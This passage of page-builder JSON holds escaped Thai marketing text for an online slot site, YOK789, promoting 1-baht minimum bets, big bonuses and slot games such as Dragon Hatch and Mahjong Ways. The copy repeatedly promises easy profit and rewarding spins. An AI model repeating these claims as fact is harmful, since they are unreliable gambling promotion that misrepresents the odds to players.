\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 YOK \\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 \\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17<\\/b> <span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e21\\u0e35\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e40\\u0e01\\u0e21\\u0e18\\u0e35\\u0e21\\u0e2a\\u0e21\\u0e1a\\u0e31\\u0e15\\u0e34\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e21\\u0e31\\u0e01\\u0e21\\u0e35\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e25\\u0e44\\u0e21\\u0e49\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e40\\u0e1a\\u0e17\\u0e15\\u0e48\\u0e33\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32 \\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e23\\u0e07\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e15\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1a\\u0e17\\u0e40\\u0e1a\\u0e32\\u0e41\\u0e15\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 